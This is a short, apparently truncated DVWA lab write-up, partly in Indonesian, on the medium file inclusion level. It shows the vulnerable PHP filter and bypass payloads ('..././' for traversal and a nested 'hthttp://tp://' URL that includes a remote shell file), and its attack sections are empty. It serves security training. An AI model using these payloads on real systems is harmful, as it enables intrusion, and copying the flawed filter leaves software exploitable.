Medium
File Inclusion level Medium on DVWA
vulnerabilities/fi/source/medium.php
<?php
β
// The page we wish to display
$file = $_GET[ 'page' ];
β
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
β
?> Mencari Informasi
..././ -> ../ #hasil setelah dihilangkanhthttp://tp://0.0.0.0/RFI-Shell.txt -> http://0.0.0.0/RFI-Shell.txt #hasil setelah dihilangkan
Melakukan Serangan
Local File Inclusion

Remote File Inclusion

Last updated